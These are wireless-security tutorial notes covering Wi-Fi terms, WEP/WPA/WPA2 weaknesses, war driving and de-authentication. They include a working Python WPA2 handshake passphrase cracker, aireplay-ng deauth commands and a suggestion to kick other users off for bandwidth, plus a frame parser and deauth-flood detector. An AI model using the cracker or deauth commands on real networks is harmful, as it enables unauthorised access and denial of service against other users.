SSID (sometimes called ESSID) is short for Service Set Identifier. It is the public name of a wireless network, used to identify a particular network. SSIDs are case sensitive, can be up to 32 bytes long and are usually a sequence of letters and numbers. SSIDs are almost like the domain name of a wireless network; different wireless networks in the same geographical area use different SSIDs to tell them apart. BSSID: Basic Service Set Identifier, the 48-bit MAC address of the access point of a wireless network. A Wireless Access Point (WAP, or just AP) is a device that allows devices (laptops, mobiles) to connect to a wireless network using Wi-Fi and other wireless standards. Usually an AP serves multiple users within a specific area, and as users move beyond its range they are automatically handed over to the next AP, so a large physical space (like a conference centre) may require many APs sharing the same SSID.

MAC Address: short for Media Access Control address, a 48-bit unique address that identifies every node in a network. MAC addresses are assigned at the time of manufacture; however, they can be changed in software, which is why MAC address filtering on an AP is not a real access control. In wireless networks, even APs have MAC addresses. PSK: stands for Pre-Shared Key and is commonly used in encryption systems. It is a password or secret key shared amongst all the users of that particular system. In wireless networks it refers to the passphrase shared between all users and the AP, without which nobody can connect to the wireless network. Because every user knows the same secret and it is derived from a human-chosen passphrase, a PSK is vulnerable to dictionary and brute-force attacks.

WEP (Wired Equivalent Privacy) is a security protocol that encrypts data transmitted over wireless networks using a secret key. There are typically two key sizes, 64-bit and 128-bit (a 40- or 104-bit key plus a 24-bit initialisation vector). In the WEP protocol, the AP and all the clients connected to the network must know the same secret key (the PSK); when a user connects to a WEP-encrypted network, he needs to enter it, and this key is then used to encrypt all data transmission. It is a common misconception that WEP passwords are meant for authentication and access control: WEP was designed to encrypt wireless communication, not to authenticate users, although in practice a user who does not know the key cannot connect. WEP has been cracked, and very easily: its RC4 key stream repeats because the 24-bit IV wraps quickly, and weak IVs leak key bytes, so an attacker who captures enough traffic can recover the key in minutes. This led to the creation of better and more secure wireless encryption standards. WEP also does not provide any way to distribute keys between the AP and clients, which makes it difficult to change the key regularly; hence most system administrators and users keep the same key for long periods. This static nature of WEP keys is its biggest weakness, and it gives an attacker plenty of time to find the encryption key of the network.


WPA stands for Wi-Fi Protected Access and is the more secure, improved replacement for WEP. It provides better data encryption using TKIP (Temporal Key Integrity Protocol), which derives a fresh per-packet key from the master key and adds a message integrity check (MIC) to detect tampering. It also provides better user authentication: in WPA-Enterprise, clients authenticate through 802.1X with the Extensible Authentication Protocol (EAP), typically against a RADIUS server using certificates, so that only authorised users can connect; in WPA-Personal a pre-shared key is used instead.

WPA2 is the upgraded version of WPA with a higher level of security. It uses the Advanced Encryption Standard (AES) in CCMP mode to provide stronger encryption. WPA2 negotiates a unique session key for each client (derived during the four-way handshake), uses it to encrypt every data packet and avoids key reuse. At the time of these notes it is the most secure wireless encryption available; note, however, that WPA2-Personal is still only as strong as its passphrase, because an attacker who captures a client's four-way handshake can test passphrases against it offline. RSSI: Received Signal Strength Indication represents the signal strength of a wireless network. RSSI values are typically reported in dBm and range from 0 to -100: the closer the value is to 0, the better the signal, and the closer it is to -100, the worse the signal.
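The following Python example, added here and not part of the course, shows why the PSK is "vulnerable to dictionary and brute force attacks" even under WPA2: it derives the PMK from passphrase and SSID exactly as WPA/WPA2-Personal does (PBKDF2-HMAC-SHA1, 4096 rounds), derives the per-session PTK from the values exchanged in the clear during the four-way handshake, and verifies the key MIC of handshake message 2 for each candidate passphrase. The "captured" handshake is fabricated inside the example (made-up MAC addresses, nonces and a made-up secret passphrase); only the derivation functions follow the standard.

```python
import hashlib
import hmac
import struct

MIC_OFFSET = 81   # key MIC position inside an EAPOL-Key frame (4-byte 802.1X header + key fields)


def pmk_from_passphrase(passphrase, ssid):
    """WPA/WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk, ap_mac, client_mac, anonce, snonce):
    """PRF-512 from IEEE 802.11i: the pairwise transient key for this session.
    Everything here except the PMK is sent in the clear during the handshake."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for counter in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([counter]),
                        hashlib.sha1).digest()
    return out[:64]          # KCK = [:16], KEK = [16:32], TK = [32:48]


def eapol_mic(kck, eapol_frame):
    """WPA2 (CCMP) key MIC: HMAC-SHA1 over the frame with the MIC field zeroed, truncated to 16."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_psk(ssid, ap_mac, client_mac, anonce, snonce, eapol_frame, wordlist):
    """Offline dictionary attack: one captured handshake, no further contact with the AP."""
    captured_mic = eapol_frame[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = derive_ptk(pmk, ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), captured_mic):
            return candidate
    return None


def constructed_handshake(passphrase, ssid):
    """Fabricate message 2 of a four-way handshake as a sniffer would see it.
    MAC addresses and nonces are made-up constants; only the PMK is secret."""
    ap_mac = bytes.fromhex("001ea602037e")
    client_mac = bytes.fromhex("0021bb123456")
    anonce = bytes(range(32))
    snonce = bytes(range(100, 132))
    body = struct.pack("!BHH", 2, 0x010A, 16)           # descriptor type 2 (RSN), key info, key length
    body += (1).to_bytes(8, "big") + snonce              # replay counter, SNonce
    body += b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8    # key IV, key RSC, key ID
    body += b"\x00" * 16                                 # MIC placeholder
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
    body += struct.pack("!H", len(rsn_ie)) + rsn_ie
    frame = struct.pack("!BBH", 2, 3, len(body)) + body  # 802.1X: version 2, type 3 = EAPOL-Key
    assert len(frame) == MIC_OFFSET + 16 + 2 + len(rsn_ie)
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, client_mac, anonce, snonce)[:16]
    frame = frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]
    return ap_mac, client_mac, anonce, snonce, frame


def demo():
    ssid = "CoffeeShop"
    handshake = constructed_handshake("letmein2010", ssid)   # the secret the attacker does not know
    wordlist = ["password", "12345678", "coffeeshop", "letmein2010", "qwertyuiop"]
    return crack_psk(ssid, *handshake, wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

Each candidate costs 4096 HMAC-SHA1 iterations, which is the only thing slowing the attacker down; GPU crackers do millions of these per second, so a passphrase from any wordlist falls quickly while a long random one does not. Note that the SSID is the salt, which is why the same passphrase on a differently named network yields a different PMK and a precomputed table is only useful for common SSIDs.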

War Driving
War driving is the technique of searching for accessible wireless networks by a person with a laptop or PDA, either sitting in a moving car or just walking around. Typically, in war driving a user can find out the following information about each WLAN in range: SSID, MAC address (BSSID), type of security in use (open, WEP, WPA, WPA2), signal strength and location (with GPS).

There are usually 2 ways in which war-driving tools discover wireless networks.
Beacons: All APs periodically transmit beacons (by default about every 1/10th of a second) to announce their presence, and these contain important network information, especially the SSID. Many war-driving tools simply listen for such beacons to discover WLANs. This technique does not require the war driver to send any data to any wireless network, so it is a passive scanning technique. Some APs omit their SSID from their beacons to hide from war drivers, but such APs are still detected, just without their SSID.
Probe Requests and Responses: These are packets sent by a computer asking either APs with a specific SSID or all APs to respond. A probe request that names a particular SSID is a 'directed probe request', and only APs serving that SSID reply. If a NULL (empty) probe request is sent, all APs that hear it are supposed to reply, although APs configured to hide their SSID generally ignore wildcard probes and answer only directed ones. All probe responses contain the SSID of the network they came from. This is the active scanning technique of war driving, and unlike beacon listening it is visible to the network being scanned.

War Driving Tools: There are various tools that allow war driving:
inSSIDer (Windows)
Vistumbler (Windows Vista and later)
NetStumbler (Windows)
Kismet (Linux)
AirMagnet (commercial, expensive)

Re-Association :
Association and re-association request packets must contain the SSID of the network. Hence they help an attacker discover the SSID even of those networks that do not broadcast it in their beacon packets. This is another example of passive war driving: the attacker just waits for a client to connect or reconnect.

De-Authentication Attack :
In case a particular AP is not broadcasting its SSID in its beacon packets, normally you have to wait for one of the clients to send a re-association request to the AP, or for a new client to send an association request. Instead, it is possible to send a de-authentication packet to the broadcast address of the target WLAN with a spoofed source address of the AP. This will lead to all the clients being disconnected; they then try to reconnect by sending association requests, which allows you to grab the SSID. This can easily be executed with the help of a very interesting tool called aireplay-ng, which is part of the popular Aircrack-ng toolkit (we will learn more about this toolkit in detail later). You can use it to kick active users off the network and force them to re-associate, revealing the SSID. If you are connected to a wireless network and are getting low speeds because there are too many active users on it, it is also possible to run a de-authentication attack to kick the other users off and get more bandwidth for yourself, which is a denial of service against them.

aireplay-ng -0 50 -a AP_MAC ath0
This sends 50 de-authentication frames to the broadcast address and temporarily kicks all users off the wireless network.

aireplay-ng -0 1 -a AP_MAC -c CLIENT_MAC ath0
where:
-0 means de-authentication attack; the number that follows is how many de-authentication packets to send (1 here, 50 above), and 0 means send them non-stop
-a AP_MAC is the MAC address (BSSID) of the access point
-c CLIENT_MAC is the MAC address of the client to de-authenticate; if omitted, a broadcast de-authentication is sent and all clients are kicked off
ath0 is the name of the wireless interface in monitor mode
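The following Python example is added here and is not from the course. It shows what the war-driving and de-authentication sections above look like at the frame level: it builds 802.11 management frames (beacon, probe response and de-authentication) from a made-up capture, parses the SSID tag so that a hidden network (zero-length SSID in the beacon) is recognised as hidden and then filled in from a probe response, and finally implements the detection a wireless IDS applies to the aireplay-ng attack, counting de-authentication frames per BSSID and receiver. All MAC addresses, SSIDs and the reason code in the frames are constructed for the illustration.

```python
import struct
from collections import Counter

BROADCAST = b"\xff" * 6
SUBTYPE_PROBE_RESPONSE, SUBTYPE_BEACON, SUBTYPE_DEAUTH = 5, 8, 12


def build_mgmt_frame(subtype, addr1, addr2, bssid, body, seq=0):
    """802.11 management frame: frame control (type 0), duration, addr1 (receiver),
    addr2 (transmitter), addr3 (BSSID), sequence control, then the body."""
    frame_control = struct.pack("<H", subtype << 4)
    return (frame_control + struct.pack("<H", 0) + addr1 + addr2 + bssid
            + struct.pack("<H", seq << 4) + body)


def beacon_body(ssid, channel=6, interval=100):
    """Fixed fields (timestamp, interval, capabilities) then tagged parameters.
    A hidden network sends tag 0 with a zero-length (or all-zero) SSID."""
    body = struct.pack("<QHH", 0, interval, 0x0411)
    body += bytes([0, len(ssid)]) + ssid        # tag 0: SSID
    body += bytes([3, 1, channel])              # tag 3: DS parameter set (channel)
    return body


def parse_ssid_tag(tagged):
    """Walk the tag/length/value list and return the SSID, or None if hidden/absent."""
    off = 0
    while off + 2 <= len(tagged):
        tag, length = tagged[off], tagged[off + 1]
        value = tagged[off + 2:off + 2 + length]
        if tag == 0:
            if length == 0 or value == b"\x00" * length:
                return None
            return value.decode("utf-8", errors="replace")
        off += 2 + length
    return None


def parse_frame(frame):
    fc, = struct.unpack("<H", frame[:2])
    info = {"type": (fc >> 2) & 3, "subtype": (fc >> 4) & 0xF,
            "addr1": frame[4:10], "addr2": frame[10:16], "bssid": frame[16:22]}
    body = frame[24:]
    if info["type"] == 0 and info["subtype"] in (SUBTYPE_BEACON, SUBTYPE_PROBE_RESPONSE):
        info["ssid"] = parse_ssid_tag(body[12:])   # skip the 12 bytes of fixed fields
    elif info["type"] == 0 and info["subtype"] == SUBTYPE_DEAUTH:
        info["reason"], = struct.unpack("<H", body[:2])
    return info


def network_inventory(frames):
    """What a passive war-driving tool learns: BSSID -> SSID (None until revealed)."""
    seen = {}
    for frame in map(parse_frame, frames):
        if "ssid" in frame:
            seen[frame["bssid"]] = frame["ssid"] or seen.get(frame["bssid"])
    return seen


def deauth_flood_sources(frames, threshold=5):
    """Defender's view: count de-authentication frames per (BSSID, receiver) and
    report bursts at or above threshold; a broadcast receiver means 'everyone off'."""
    counts = Counter((f["bssid"], f["addr1"]) for f in map(parse_frame, frames)
                     if f["type"] == 0 and f["subtype"] == SUBTYPE_DEAUTH)
    return {key: n for key, n in counts.items() if n >= threshold}


def constructed_capture():
    """Made-up frames: a visible AP, a hidden AP that answers a directed probe,
    and a 50-frame broadcast de-authentication burst spoofing the hidden AP."""
    ap_a, ap_b = bytes.fromhex("001ea602037e"), bytes.fromhex("00a1b2c3d4e5")
    client = bytes.fromhex("0021bb123456")
    frames = [build_mgmt_frame(SUBTYPE_BEACON, BROADCAST, ap_a, ap_a, beacon_body(b"CoffeeShop")),
              build_mgmt_frame(SUBTYPE_BEACON, BROADCAST, ap_b, ap_b, beacon_body(b"")),
              build_mgmt_frame(SUBTYPE_PROBE_RESPONSE, client, ap_b, ap_b, beacon_body(b"HiddenNet"))]
    frames += [build_mgmt_frame(SUBTYPE_DEAUTH, BROADCAST, ap_b, ap_b, struct.pack("<H", 7), seq=i)
               for i in range(50)]
    return frames


if __name__ == "__main__":
    capture = constructed_capture()
    print({k.hex(":"): v for k, v in network_inventory(capture).items()})
    print({(a.hex(":"), b.hex(":")): n for (a, b), n in deauth_flood_sources(capture).items()})
```

Because management frames in WPA2 networks are neither encrypted nor authenticated (unless 802.11w protected management frames are enabled), the spoofed source address in the burst is indistinguishable from the real AP, so a defender can only detect the attack by its volume, which is what deauth_flood_sources does.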